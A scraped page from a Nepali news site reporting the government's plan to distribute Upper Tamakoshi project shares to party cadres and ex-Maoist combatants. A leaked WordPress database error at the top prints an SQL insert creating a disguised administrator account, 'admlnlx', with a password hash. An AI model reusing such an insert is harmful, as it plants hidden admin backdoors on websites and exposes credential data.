WordPress database error: [Duplicate entry '0' for key 'PRIMARY']INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$BeEGOTflL6F1LGb0r19ew8FLXZIzq6/', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-01-05 11:33:15', '', 'admlnlx', 'admlnlx')
काठमाडौं,पुस ११-
सरकारले माथिल्लो तामाकोसी आयोजनामा आफ्नो नाममा रहेको संस्थापक सेयर बाँडेर पार्टी कार्यकर्ता पोस्ने तयारी गरेको छ। यो खबर हामीले आजको नागरिक दैनिकबाट लिएका हौ।उसले आयोजनालाई ऋणका रूपमा दिएको ११ अर्ब रूपैयाँ बराबरको सेयर माओवादी पूर्वलडाकु अति विपन्न तथा सहित र बेपत्ताका परिवारका नाममा पार्टी कार्यकर्तालाई बाढ्न लागेको हो।
कात्तिक तेस्रो सता तामाकोसी आयोजनास्थलको आकस्मिक निरीक्षणमा पुगेका प्रधानमन्त्री पुष्पकमल दाहालले सरकारी ऋणलाई सेयरका रूपमा वितरण गर्ने आश्वासन बाँडेका थिए। राजधानी फर्केलगत्तै दाहालले त्यसका लागि मापदण्ड मस्यौदा बनाउन कर्मचारीलाई निर्देशन दिएका थिए।
सेयर वितरणको खाका कसरी तयार पार्दा प्रभावकारी हुन्छ भन्नेबारे प्रधानमन्त्री दाहालले विज्ञहरूसँग राय सुझावसमेत लिएका थिए। विज्ञबाट पनि सरकारले आयोजनालाई ऋणका रूपमा दिएको ११ अर्ब रकम सेयरका रूपमा पूर्वमाओवादी लडाकु, अति विपन्न तथा सहित र बेपत्ताका परिवारलाई वितरण गर्न सकिने सुझाव दिएपछि त्यही आधारमा सरकार अघि बढेको हो।